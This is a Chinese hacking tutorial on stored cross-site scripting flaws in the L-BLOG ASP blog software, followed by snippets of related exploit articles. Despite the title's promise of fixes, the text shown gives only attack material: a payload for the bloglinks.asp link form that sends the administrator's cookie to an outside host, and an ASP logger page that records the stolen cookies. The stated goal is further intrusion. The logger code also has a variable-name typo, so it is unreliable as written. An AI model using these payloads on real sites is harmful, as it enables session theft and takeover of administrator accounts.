L-BLOG 漏洞介绍及修复(图)

首先说说的是什么是blog(博客)?因为很多人都不知道blog是什么?就算看完了这篇文章都不明白,所以浪费一些篇幅!
释义:
    网络出版(Web Publishing)、发表和张贴(Post——这个字当名词用时就是指张贴的文章)文章是个急速成长的网络活动,现在甚至出现了一个用来指称这种网络出版和发表文章的专有名词——Weblog,或Blog。一个Blog就是一个网页,它通常是由简短且经常更新的Post所构成;这些张贴的文章都按照年份和日期排列。Blog的内容和目的有很大的不同,从对其他网站的超级链接和评论,有关公司、个人、构想的新闻到日记、照片、诗歌、散文,甚至科幻小说的发表或张贴都有。许多Blogs是个人心中所想之事情的发表,其它Blogs则是一群人基于某个特定主题或共同利益领域的集体创作。Blog好象对网络传达的实时讯息。撰写这些Weblog或Blog的人就叫做Blogger或Blog writer。在网络上发表Blog的构想使于1998年,但到了2000年才真正开始流行。起初,Bloggers将其每天浏览网站的心得和意见记录下来,并予以公开,来给其它人参考和遵循。但随着Blogging快速扩张,它的目的与最初已相去甚远。目前网络上数以千计的 Bloggers发表和张贴Blog的目的有很大的差异。不过,由于沟通方式比电子邮件、讨论群组更简单和容易,Blog已成为家庭、公司、部门和团队之间越来越盛行的沟通工具,因为它也逐渐被应用在企业内部网络(Intranet)。
    现在在网络上使用的blog程序大致分为多用户和单用户两个版本,ASP的Blog程序以及版本都比较多,自然而然的就会存在着各种各样的漏洞啊!现在主流的ASP Blog程序有以下几种:

1.L-BLOG (Loveyuki编写的ASP+ACCESS架构),这个程序的修改以及美化版本N多
2.O-BLOG(叶开编写的ASP+ACCESS/SQL架构多用户)
3.Misslong(多用户版本)
4.theanswer‘s blog(外国开源网站项目程序,代码谨慎简洁)
5.SIC's blog(L-BLOG的修改版本,安全性能都比原作强)
6.Dlong(猪飞飞编写的程序属于比较早的blog程序,停止开发了)

我就拿L-BLOG程序来进行分析!看看我们的L-BLOG有多少问题?

一.L-BLOG程序漏洞.(跨站式脚本漏洞)
   使用最广的程序就会有更多的漏洞存在,我们L-BLOG程序也是一样啊!!首先看看的就是基本的漏洞跨站式脚本漏洞,在Member.asp/favorite.asp/bloglinks.asp页面里面发现,作者并没有为了防止跨站脚本的漏洞,所以完全没有过滤到任何的敏感字符,借此我们就可以进行COOKIE的盗取,以及对于BLOG的破坏了!
    我们就拿Member.asp页面的“个人主页”栏目设置作为例子,我们发现只要输入特定恶意代码,这样子就可以拿到管理员的COOKIE或者进行破坏!例如:<script>alert("TEST.BY.H4K_B4N");</script>在个人主页栏目的时候

当管理员或者其他用户查看我们设定的帐号资料的时候,代码的就会启动,这样子就完成了跨展脚本的攻击了!

在三个页面当中危害性最大的就是bloglinks.asp添加连接页面,只要在申请连接的地址输入恶意代码,就可以直接拿到管理员的COOKIE了,因为每个连接都需要经过管理员的审核才可以,这样子每当管理员登陆admincp.asp管理后台的相关页面就会启动代码从而得到我们需要的COOKIE了!
代码如下:
<script> document.location='http://yoursite.com/cookie.asp?'%2Bdocument.cookie
</script>

COOKIE页面代码:
<% 
Testfile=server.mappath("info.txt")
Msg=request.servervariables("QUERY_STRING")
Set fs=server.createobject("scripting.filesystemobject")
Set thisfile=fs.opentextfile(testfile,8,true,0)
Thidfile.writeline(""&msg&"")
Thisfile.close
Set fs=nothing
%>
利用以上的代码,我们就可以很轻松的拿到管理员的COOKIE资料,进行进一步的入侵了。

(0)

相关推荐

  • L-BLOG 漏洞介绍及修复(图)

    首先说说的是什么是blog(博客)?因为很多人都不知道blog是什么?就算看完了这篇文章都不明白,所以浪费一些篇幅!释义:     网络出版(Web Publishing).发表和张贴(Post--这个字当名词用时就是指张贴的文章)文章是个急速成长的网络活动,现在甚至出现了一个用来指称这种网络出版和发表文章的专有名词--Weblog,或Blog.一个Blog就是一个网页,它通常是由简短且经常更新的Post所构成:这些张贴的文章都按照年份和日期排列.Blog的内容和目的有很大的不同,从对其他网站的

  • 关于Redis未授权访问漏洞利用的介绍与修复建议

    前言 本文主要给大家介绍了关于Redis未授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧. 一.漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据.攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Re

  • PHP博客程序C-blog2.0漏洞测试大揭密(图)

    c-blog2.1测试手记 朋友买了空间支持php但是没有mysql数据库,说是这空间商主要是支持asp脚本的.哎 难道就不能玩php了吗?  嘿嘿 可以用php+access的php程序啊.百度了下发现了c-blog这个程序,它有个php+access版本的.down下了看看,就有了这次测试的结果. 1.暴出物理路径 在看了这个blog后,发现他写的到上没什么太大的bug,文件比较少而且简结. 它的说明上看到了如下: ./include   包含常用类库 编辑器 配置文件 -->/config

  • Windows家族内部各个安全漏洞集体大搜捕(图)

    WinXP系统前所未有地稳定和安全,但还是存在着各种各样的安全漏洞,如果我们对此无动于衷,网上黑客就会有机可乘,他们可以轻易盗窃你的商业机密.破坏你的重要资料--,造成的损失可是巨大的吆!怎样保证您的Windows安全呢?比较好的办法就是经常下载Windows安全补丁,进行系统更新,以便堵住各种安全漏洞,这种工作要象给杀毒软件升级那样经常做.下面就让我们来看看Windows家族有那些安全漏洞,如何堵住这些漏洞? 一.WinXP的安全漏洞 1.快速用户切换漏洞 Windows XP快速用户切换功能

  • 用漏洞提升计算机控制权限(图)

    据称Windows COM结构存在安全问题,本地或远程攻击者可以利用这个漏洞提升特权或执行任意指令.受影响的操作系统和程序在处理COM结构化存储文件时,在访问共享内存的方式中存在权限提升漏洞,一个已登录的用户可利用此漏洞完全控制系统. 安全公告牌 这是一个权限提升漏洞. 成功利用此漏洞的攻击者可以完全控制受影响的系统. 攻击者可随后安装程序;查看.更改或删除数据;或者创建拥有完全用户权限的新账户. 要利用此漏洞,攻击者必须能够本地登录到系统并运行程序. 受影响的系统包括:Windows 2000

  • Apache log4j2-RCE 漏洞复现及修复建议(CVE-2021-44228)

    目录 Apache log4j2-RCE 漏洞复现 0x01 漏洞简介 0x02 环境准备 0x03 漏洞验证(DNSLOG篇) 0x04 漏洞验证(远程代码执行弹计算器&记事本篇) 0x05 漏洞深度利用(反弹shell) 0x06 影响范围及排查方法 0x07 修复建议 0x08 涉及资源 Apache log4j2-RCE 漏洞复现 0x01 漏洞简介 Apache Log4j2是一个基于Java的日志记录工具.由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请

  • 利用IE Object Data漏洞制做全新网页木马(图)

    原发黑客x档案第8期,版权归杂志所有. 利用Internet Explorer Object Data漏洞制做全新网页木马lcx今年8月20日,微软公布了一个最高严重等级的重要漏洞--Internet Explorer Object数据远程执行漏洞.这对于网页木马爱好者来说可是一件好事,我们可以用这个漏洞来制做一款全新的暂时不会被查杀的木马了.在介绍如何制做这个全新网页木马前我先给大家简单介绍一下该漏洞.一.漏洞描述该漏洞内由eEye Digital Security发现并于8月20号公布的,微

  • 常用网页编辑器漏洞手册(全面版)fckeditor,ewebeditor

    FCKeditor FCKeditor编辑器页/查看编辑器版本/查看文件上传路径 FCKeditor编辑器页 FCKeditor/_samples/default.html 查看编辑器版本 FCKeditor/_whatsnew.html 查看文件上传路径 fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&Curren

  • Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范

    一.概述    漏洞介绍: http://coolersky.com/leak/programme/bbs/2006/0515/515.html    前几天就听Hak_Ban说有人把dvbbs7的一个注入漏洞给发布出去了,一直也没时间看看,下午跟Edward要了个链接看了看: http://www.eviloctal.com/forum/read.php?tid=22074    本站转贴为: http://coolersky.com/articles/hack/analysis/progra

  • 漏洞漫舞的飞骋

    作者:玄猫[B.C.T] 网站:http://www.cnbct.org/&http://www.blackwoods.cn/ 原件: http://www.cnbct.org/xuan1.doc 转载时,请注意版权,发于黑X2005年7期 一.前言. 初识飞骋似乎还是2002年,那时它推出了一个似乎叫飞骋邮局的东西,提供280M的空间(在当时算很大了),当时学SQL Injection的时候,曾用它练过手,现在这个站发展的不小,于是再对它作次安全检测吧,发现漏洞漫天飞舞啊,而且很有意思,整个网

随机推荐